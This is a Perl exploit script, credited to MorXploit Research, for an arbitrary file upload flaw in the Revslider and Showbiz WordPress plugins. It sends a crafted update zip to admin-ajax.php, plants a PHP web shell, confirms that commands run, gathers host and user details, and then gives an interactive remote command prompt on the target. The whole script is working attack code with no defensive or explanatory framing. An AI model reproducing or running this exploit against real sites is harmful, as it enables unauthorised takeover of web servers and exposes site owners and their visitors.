#!/usr/bin/perl
use LWP::UserAgent;
use MIME::Base64;
use strict;
sub banner {
system (($^O eq 'MSWin32' ) ? 'cls' : 'clear' );
print "===================================================\n" ;
print "--- Revslider/Showbiz shell upload exploit\n" ;
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n" ;
print "--- MorXploit Research www.MorXploit.com\n" ;
print "===================================================\n" ;
}
if (! defined ( $ARGV [0] && $ARGV [1])) {
banner();
print "perl $0 <target> <plugin>\n" ;
print "perl $0 http://localhost revslider\n" ;
print "perl $0 http://localhost showbiz\n" ;
exit ;
}
my $zip1 = "revslider.zip" ;
my $zip2 = "showbiz.zip" ;
unless (-e ( $zip1 && $zip2 ))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n" ;
exit ;
}
my $host = $ARGV [0];
my $plugin = $ARGV [1];
my $action ;
my $update_file ;
if ( $plugin eq "revslider" ) {
$action = "revslider_ajax_action" ;
$update_file = "$zip1" ;
}
elsif ( $plugin eq "showbiz" ) {
$action = "showbiz_ajax_action" ;
$update_file = "$zip2" ;
}
else {
banner();
print "[-] Wrong plugin name\n" ;
print "perl $0 <target> <plugin>\n" ;
print "perl $0 http://localhost revslider\n" ;
print "perl $0 http://localhost showbiz\n" ;
exit ;
}
my $target = "wp-admin/admin-ajax.php" ;
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php" ;
sub randomagent {
my @array = ( 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0' ,
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0' ,
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' ,
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' ,
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' ,
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array [ rand @array ];
return ( $random );
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua ->timeout(10);
$ua ->agent( $useragent );
my $status = $ua ->get( "$host/$target" );
unless ( $status ->is_success) {
banner();
print "[-] Xploit failed: " . $status ->status_line . "\n" ;
exit ;
}
banner();
print "[*] Target set to $plugin\n" ;
print "[*] MorXploiting $host\n" ;
my $exploit = $ua ->post( "$host/$target" , Cookie => "" , Content_Type => "form-data" , Content => [action => "$action" , client_action => "update_plugin" , update_file => [ "$update_file" ]]);
print "[*] Sent payload\n" ;
if ( $exploit ->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n" ;
}
elsif ( $exploit ->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n" ;
exit ;
}
elsif ( $exploit ->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n" ;
exit ;
}
else {
$exploit ->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n" ;
print "[-] " . $exploit ->decoded_content unless ( defined $1 );
print "\n" ;
exit ;
}
print "[*] Checking if shell was uploaded\n" ;
sub rndstr{ join '' , @_ [ map { rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a' .. 'z' );
my $cmd1 = encode_base64( "echo $rndstr" );
my $status = $ua ->get( "$host/$shell?cmd=$cmd1" );
if ( $status ->decoded_content =~ / system \(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n" ;
exit ;
}
elsif ( $status ->decoded_content !~ / $rndstr /) {
print "[-] Xploit failed: " . $status ->status_line . "\n" ;
exit ;
}
elsif ( $status ->decoded_content =~ / $rndstr /) {
print "[+] Shell successfully uploaded\n" ;
}
my $cmd2 = encode_base64( "whoami" );
my $whoami = $ua ->get( "$host/$shell?cmd=$cmd2" );
my $cmd3 = encode_base64( "uname -n" );
my $uname = $ua ->get( "$host/$shell?cmd=$cmd3" );
my $cmd4 = encode_base64( "id" );
my $id = $ua ->get( "$host/$shell?cmd=$cmd4" );
my $cmd5 = encode_base64( "uname -a" );
my $unamea = $ua ->get( "$host/$shell?cmd=$cmd5" );
print $unamea ->decoded_content;
print $id ->decoded_content;
my $wa = $whoami ->decoded_content;
my $un = $uname ->decoded_content;
chomp ( $wa );
chomp ( $un );
while () {
print "\n$wa\@$un:~\$ " ;
chomp ( my $cmd =<STDIN>);
if ( $cmd eq "exit" )
{
print "Aurevoir!\n" ;
exit ;
}
my $ucmd = encode_base64( "$cmd" );
my $output = $ua ->get( "$host/$shell?cmd=$ucmd" );
print $output ->decoded_content; }
|